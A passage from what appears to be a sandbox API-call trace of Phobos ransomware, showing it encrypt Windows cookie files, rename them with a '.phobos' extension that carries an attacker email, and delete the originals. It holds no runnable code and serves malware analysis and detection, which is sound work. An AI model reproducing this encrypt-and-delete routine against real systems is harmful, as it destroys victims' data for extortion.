halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.045] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.045] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.045] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x114, lpOverlapped=0x0) returned 1 [0194.046] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0194.046] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0194.047] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0194.047] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.047] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.047] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.047] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.048] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.048] CloseHandle (hObject=0x194) returned 1 [0194.048] CloseHandle (hObject=0x178) returned 1 [0194.048] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt")) returned 1 [0194.049] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.054] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=86) returned 1 [0194.054] CloseHandle (hObject=0x154) returned 1 [0194.054] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt")) returned 0x2020 [0194.054] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.055] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.055] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.055] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.055] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x56, lpOverlapped=0x0) returned 1 [0194.061] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0194.061] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x60, lpOverlapped=0x0) returned 1 [0194.062] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0194.062] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.062] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.062] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.062] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.062] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.062] CloseHandle (hObject=0x154) returned 1 [0194.062] CloseHandle (hObject=0x134) returned 1 [0194.063] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt")) returned 1 [0194.064] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.064] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=414) returned 1 [0194.064] CloseHandle (hObject=0x134) returned 1 [0194.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt")) returned 0x2020 [0194.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.064] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.065] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.065] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.065] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.065] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x19e, lpOverlapped=0x0) returned 1 [0194.068] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0) returned 1 [0194.068] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a0, lpOverlapped=0x0) returned 1 [0194.069] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0194.069] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.070] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.070] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.070] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.070] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.070] CloseHandle (hObject=0x134) returned 1 [0194.070] CloseHandle (hObject=0x154) returned 1 [0194.070] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt")) returned 1 [0194.071] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.072] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=32768) returned 1 [0194.072] CloseHandle (hObject=0x154) returned 1 [0194.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")) returned 0x2026 [0194.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.072] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.072] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.073] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.073] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.073] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8000, lpOverlapped=0x0) returned 1 [0194.107] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010, dwBufLen=0x8010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010) returned 1 [0194.107] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8010, lpOverlapped=0x0) returned 1 [0194.109] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0194.109] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.109] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.109] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.109] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.109] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.109] CloseHandle (hObject=0x154) returned 1 [0194.109] CloseHandle (hObject=0x134) returned 1 [0194.109] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")) returned 1 [0194.111] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.112] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=102) returned 1 [0194.112] CloseHandle (hObject=0x134) returned 1 [0194.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt")) returned 0x2020 [0194.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.113] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.113] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.114] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.114] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.114] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x66, lpOverlapped=0x0) returned 1 [0194.115] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.115] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x70, lpOverlapped=0x0) returned 1 [0194.116] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0194.116] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.116] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x90, dwBufLen=0x90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x90) returned 1 [0194.116] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.116] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x142, lpOverlapped=0x0) returned 1 [0194.116] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.116] CloseHandle (hObject=0x134) returned 1 [0194.116] CloseHandle (hObject=0x154) returned 1 [0194.116] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt")) returned 1 [0194.117] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.118] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=102) returned 1 [0194.118] CloseHandle (hObject=0x154) returned 1 [0194.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt")) returned 0x2020 [0194.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 